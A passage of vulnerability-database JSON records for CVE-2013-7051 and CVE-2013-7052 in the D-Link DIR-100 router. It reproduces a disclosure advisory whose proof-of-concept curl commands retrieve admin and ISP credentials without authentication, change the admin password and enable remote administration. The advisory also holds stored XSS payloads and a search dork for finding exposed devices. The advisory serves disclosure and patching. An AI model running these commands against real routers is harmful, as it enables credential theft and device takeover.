deactivated on the\ninternet-port. It is recommended to upgrade the router with the newest firmware\nof the D-Link DIR-100. \n\n# 5 Timeline\n\n2013-09-13 - First Contact with D-Link Support\n2013-09-19 - Sent Report\n2013-10-14 - Request Status update, Response: Beta will be available mid October\n2013-12-02 - Vendor publishes Firmware Update \n2013-12-11 - Request CVE-IDs\n2013-12-18 - Publish the report\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-7052"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007146"
},
{
"db": "CNVD",
"id": "CNVD-2014-01476"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "PACKETSTORM",
"id": "125041"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-7052",
"trust": 3.4
},
{
"db": "BID",
"id": "65290",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007146",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2014-01476",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202002-037",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "125041",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01476"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007146"
},
{
"db": "PACKETSTORM",
"id": "125041"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-037"
},
{
"db": "NVD",
"id": "CVE-2013-7052"
}
]
},
"id": "VAR-202002-0667",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01476"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01476"
}
]
},
"last_update_date": "2024-11-23T21:36:11.511000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "http://www.dlink.lt/en/"
},
{
"title": "D-Link DIR-100 cliget.cgi incorrectly restricts access to vulnerable patches",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/44082"
},
{
"title": "D-Link DIR-100 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=107309"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01476"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007146"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-037"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-522",
"trust": 1.0
},
{
"problemtype": "Externally accessible files or directories (CWE-552) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007146"
},
{
"db": "NVD",
"id": "CVE-2013-7052"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90902"
},
{
"trust": 2.3,
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"trust": 1.6,
"url": "https://www.securityfocus.com/bid/65290"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7052"
},
{
"trust": 0.4,
"url": "http://more.dlink.de/sicherheit/news.html#news8"
},
{
"trust": 0.3,
"url": "http://www.dlink.com/"
},
{
"trust": 0.3,
"url": "http://seclists.org/fulldisclosure/2014/feb/4"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cli.cgi?cmd=help\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$pptp_user\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$pptp_pass\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$log_mail_user\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7051"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=\u003cscript\u003ealert(1)\u003c/script\u003e%26use=0%26idx=2%26;commit\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cliget.cgi?cmd=help\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$sys_user1\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/login.htm\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7053"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=\u003cscript\u003ealert(1)\u003c/script\u003e%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7055"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$poe_user\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin\u0026pass=c%;$sys_passhash=4%25;commit\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7054"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$poe_pass\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$ddns1\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cli.cgi?cmd=help\u0027"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01476"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007146"
},
{
"db": "PACKETSTORM",
"id": "125041"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-037"
},
{
"db": "NVD",
"id": "CVE-2013-7052"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-01476"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007146"
},
{
"db": "PACKETSTORM",
"id": "125041"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-037"
},
{
"db": "NVD",
"id": "CVE-2013-7052"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01476"
},
{
"date": "2013-12-03T00:00:00",
"db": "BID",
"id": "65290"
},
{
"date": "2020-02-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007146"
},
{
"date": "2014-02-03T23:36:22",
"db": "PACKETSTORM",
"id": "125041"
},
{
"date": "2020-02-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202002-037"
},
{
"date": "2020-02-04T14:15:11.403000",
"db": "NVD",
"id": "CVE-2013-7052"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01476"
},
{
"date": "2013-12-03T00:00:00",
"db": "BID",
"id": "65290"
},
{
"date": "2020-02-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007146"
},
{
"date": "2020-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202002-037"
},
{
"date": "2024-11-21T02:00:14.637000",
"db": "NVD",
"id": "CVE-2013-7052"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202002-037"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0DIR-100\u00a0 Vulnerable to insufficient protection of credentials",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007146"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202002-037"
}
],
"trust": 0.6
}
}
var-202002-0666
Vulnerability from variot
D-Link DIR-100 4.03B07: cli.cgi security bypass due to failure to check authentication parameters. D-Link DIR-100 Contains an authentication vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. The D-Link DIR-100 Ethernet Broadband Router failed to perform an authentication mechanism, allowing remote attackers to exploit the vulnerability to submit requests without verifying the execution of privileged commands. D-Link DIR-100 is prone to the following security vulnerabilities: 1. An authentication-bypass vulnerability 2. Multiple information-disclosure vulnerabilities 3. A cross-site request-forgery vulnerability 4. A cross-site scripting vulnerability An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. * Title: Router D-Link DIR-100 Multiple Vulnerabilities * Date: 2013-12-18 * Author: Felix Richter * Contact: root@euer.krebsco.de * Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip * Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip * Report Version: 2.0 * Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt * Vulnerable: D-Link DIR-100 * Hardware Revision: D1 * Software Version: 4.03B07 (from 2012-04-10) * CVE Numbers: * CWE-287 Authentication Issues: CVE-2013-7051 * CWE-255 Issues with Credential Management: CVE-2013-7052 * CWE-352 Cross-Site Request Forgery: CVE-2013-7053 * CWE-79 Cross-Site Scripting: CVE-2013-7054 * CWE-200 Information Disclosure: CVE-2013-7055 * Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1 * State: Patched by Vendor * Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8
Table of Contents
1. Background
2. Technical Description
4. Severity and Remediation
5. Timeline
1. Background
The DIR-100 is designed for easy and robust connectivity among heterogeneous standards-based network devices. Computers can communicate directly with this router for automatic opening and closing of UDP/TCP ports to take full advantage of the security provided without sacrificing functionality of on-line applications.
2 Vulnerability Description
Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet Broadband Router Revision D (and potentially other devices sharing the affected firmware) that could allow a remote attacker:
- Retrieve the Administrator password without authentication leading to authentication bypass [CWE-255]
- Retrieve sensitive configuration paramters like the pppoe username and password without authentication [CWE-200]
- Execute privileged Commands without authentication through a race condition leading to weak authentication enforcement [CWE-287]
- Sending formatted request to a victim which then will execute arbitrary commands on the device (CSRF) [CWE-352]
- Store arbitrary javascript code which will be executed when a victim accesses the administrator interface [CWE-79]
CVE-Numbers for these vulnerabilities has not yet been assigned.
3 Technical Description of the Vulnerabilities
3.0 The DIR-100 Web Interface and CGI
The DIR-100 Web interface provides a cgi-script on /cliget.cgi for
unauthenticated users and /cli.cgi for authenticated requests.
list of features provided by each cgi-script can be retrieved by:
curl 'http://192.168.1.104/cliget.cgi?cmd=help'
# and respectively when authenticated
curl 'http://192.168.1.104/cli.cgi?cmd=help'
3.1 Authentication Bypass
Description
The administrator password is not protected in any way on the device, every attacker with access to the administrator interface which listens on port 80. For retrieving the Administrator password the request must not be authenticated.
Proof of Concept
The web interface provides two distinct ways to retrieve the adminstrator password:
curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'
3.2 Weak Authentication
Description
As soon as a user is logged into the administration interface, the cli CGI
is unlocked and can be used by without authenticating before as
the cgi-script does not check any other authentication parameters such as
cookies or HTTP Parameters. The only access check is if the IP-Address is
the same.
Proof of Concept
# open the router interface in a web browser and log in
firefox 'http://192.168.0.1/'
# open a new terminal or another web-browser which is currently not logged
# in and try to access
curl 'http://192.168.0.1/cli.cgi?cmd=help'
# this request will be authenticated and it will not be redirected to the
# login page. If no user is logged in, the request will be redirected to
# the login
3.3 Retrieve sensitive information
Description
Besides retrieving the administrator password without authentication it is possible to retrieve other sensitive configuration from the device as well like the PPTP and poe Username and Password, as well as the configured dyndns username and password and configured mail log credentials when these parameters are configured. No authentication is requred.
Proof of Concept
curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'
3.4 Cross-Site Request Forgery (CSRF)
Description
CSRF attacks can be launched by sending a formatted request to a victim, then tricking the victim into loading the request (often automatically), which makes it appear that the request came from the victim. As an example the attacker could change the administrator password (see Proof of Concept code) and enable system remote access.
Proof of Concept
Changing the password for administrator can be done when the ip-address is authenticated:
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# Change password
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'
# enable remote console
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'
3.5 Cross-Site Scripting (XSS)
Description
It is possible for an authenticated user to store information on the server which will not be checked on the server side for special characters which results in persistent Cross-Site Scripting Vulnerabilities. With this vulnerabilty the victim (administrator) will run javascript code in the context of the D-Link DIR-100.
XSS is possible because only on the client side (javascript code) the input is filtered and validated, sending data directly to the CGI scripts.
Proof of Concept
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# XSS in Static IP Address Tab
curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='
# XSS in Scheduler tab
curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'
4 Severity and Remediation
This exploits are considered very critical, especially when the feature of remote
administration is activated on the system.
Weak authentication, together with cross-site request forgery and authentication
bypass can result in a full device compromise from an arbitrary website the victim is
accessing, even if the device has remote administration deactivated on the
internet-port. It is recommended to upgrade the router with the newest firmware
of the D-Link DIR-100.
5 Timeline
2013-09-13 - First Contact with D-Link Support 2013-09-19 - Sent Report 2013-10-14 - Request Status update, Response: Beta will be available mid October 2013-12-02 - Vendor publishes Firmware Update 2013-12-11 - Request CVE-IDs 2013-12-18 - Publish the report
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202002-0666",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-100",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.03b07"
},
{
"model": "dir-100",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-100",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dir-100 firmware 4.03b07"
},
{
"model": "dir-100 ethernet broadband router 4.03b07",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-100 4.03b07",
"scope": null,
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dir-100 4.03b13",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01475"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007145"
},
{
"db": "NVD",
"id": "CVE-2013-7051"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Felix Richter",
"sources": [
{
"db": "BID",
"id": "65290"
},
{
"db": "PACKETSTORM",
"id": "125041"
}
],
"trust": 0.4
},
"cve": "CVE-2013-7051",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2013-7051",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2014-01475",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2013-7051",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2013-7051",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-7051",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2013-7051",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2014-01475",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202002-038",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01475"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007145"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-038"
},
{
"db": "NVD",
"id": "CVE-2013-7051"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-100 4.03B07: cli.cgi security bypass due to failure to check authentication parameters. D-Link DIR-100 Contains an authentication vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. The D-Link DIR-100 Ethernet Broadband Router failed to perform an authentication mechanism, allowing remote attackers to exploit the vulnerability to submit requests without verifying the execution of privileged commands. D-Link DIR-100 is prone to the following security vulnerabilities:\n1. An authentication-bypass vulnerability\n2. Multiple information-disclosure vulnerabilities\n3. A cross-site request-forgery vulnerability\n4. A cross-site scripting vulnerability\nAn attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. * Title: Router D-Link DIR-100 Multiple Vulnerabilities\n* Date: 2013-12-18\n* Author: Felix Richter\n* Contact: root@euer.krebsco.de\n* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip\n* Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip\n* Report Version: 2.0\n* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt\n* Vulnerable: D-Link DIR-100\n * Hardware Revision: D1\n * Software Version: 4.03B07 (from 2012-04-10)\n* CVE Numbers: \n * CWE-287 Authentication Issues: CVE-2013-7051\n * CWE-255 Issues with Credential Management: CVE-2013-7052\n * CWE-352 Cross-Site Request Forgery: CVE-2013-7053\n * CWE-79 Cross-Site Scripting: CVE-2013-7054\n * CWE-200 Information Disclosure: CVE-2013-7055\n* Google Dork: \"D-Link Systems\" inurl:bsc_internet.htm D1\n* State: Patched by Vendor\n* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8\n\n# Table of Contents\n\n 1. Background\n 2. Technical Description\n 4. Severity and Remediation\n 5. Timeline\n\n# 1. Background\n\nThe DIR-100 is designed for easy and robust connectivity among heterogeneous\nstandards-based network devices. Computers can communicate directly with this\nrouter for automatic opening and closing of UDP/TCP ports to take full\nadvantage of the security provided without sacrificing functionality of on-line\napplications. \n\n# 2 Vulnerability Description\n\nMultiple vulnerabilities have been found in the D-Link DIR-100 Ethernet\nBroadband Router Revision D (and potentially other devices sharing the \naffected firmware) that could allow a remote attacker:\n\n - Retrieve the Administrator password without authentication leading to\n authentication bypass [CWE-255]\n - Retrieve sensitive configuration paramters like the pppoe username and\n password without authentication [CWE-200]\n - Execute privileged Commands without authentication through a race\n condition leading to weak authentication enforcement [CWE-287]\n - Sending formatted request to a victim which then will execute arbitrary\n commands on the device (CSRF) [CWE-352]\n - Store arbitrary javascript code which will be executed when a victim\n accesses the administrator interface [CWE-79]\n\nCVE-Numbers for these vulnerabilities has not yet been assigned. \n\n# 3 Technical Description of the Vulnerabilities\n\n## 3.0 The DIR-100 Web Interface and CGI\n\nThe DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for\nunauthenticated users and `/cli.cgi` for authenticated requests. \n\nlist of features provided by each cgi-script can be retrieved by:\n\n curl \u0027http://192.168.1.104/cliget.cgi?cmd=help\u0027\n # and respectively when authenticated\n curl \u0027http://192.168.1.104/cli.cgi?cmd=help\u0027\n\n## 3.1 Authentication Bypass\n\n### Description\n\nThe administrator password is not protected in any way on the device, every\nattacker with access to the administrator interface which listens on port 80. \nFor retrieving the Administrator password the request must not be\nauthenticated. \n\n\n### Proof of Concept\n\nThe web interface provides two distinct ways to retrieve the adminstrator\npassword:\n\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$sys_user1\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary\u0027\n\n## 3.2 Weak Authentication\n\n### Description\n\nAs soon as a user is logged into the administration interface, the cli CGI\nis `unlocked` and can be used by without authenticating before as\nthe cgi-script does not check any other authentication parameters such as\ncookies or HTTP Parameters. The only access check is if the IP-Address is \nthe same. \n\n### Proof of Concept\n \n # open the router interface in a web browser and log in\n firefox \u0027http://192.168.0.1/\u0027 \n \n # open a new terminal or another web-browser which is currently not logged\n # in and try to access\n\n curl \u0027http://192.168.0.1/cli.cgi?cmd=help\u0027\n\n # this request will be authenticated and it will not be redirected to the\n # login page. If no user is logged in, the request will be redirected to\n # the login \n\n## 3.3 Retrieve sensitive information\n\n### Description\n\nBesides retrieving the administrator password without authentication it is\npossible to retrieve other sensitive configuration from the device as well like\nthe PPTP and poe Username and Password, as well as the configured dyndns\nusername and password and configured mail log credentials when these parameters\nare configured. \nNo authentication is requred. \n\n### Proof of Concept\n\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$ddns1\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$poe_user\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$poe_pass\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$pptp_user\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$pptp_pass\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$log_mail_user\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd\u0027\n\n## 3.4 Cross-Site Request Forgery (CSRF)\n\n### Description\n\nCSRF attacks can be launched by sending a formatted request to a victim, then\ntricking the victim into loading the request (often automatically), which\nmakes it appear that the request came from the victim. As an example the\nattacker could change the administrator password (see Proof of Concept code)\nand enable system remote access. \n\n### Proof of Concept\n\nChanging the password for administrator can be done when the ip-address is\nauthenticated:\n\n # Log into DIR-100\n curl -X POST -d \u0027uname=admin\u0026pws=password\u0026login=Login\u0027 \u0027http://192.168.0.1/login.htm\u0027\n\n # Change password\n curl \u0027http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin\u0026pass=c%;$sys_passHash=4%25;commit\u0027\n\n # enable remote console\n curl \u0027http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit\u0027\n\n## 3.5 Cross-Site Scripting 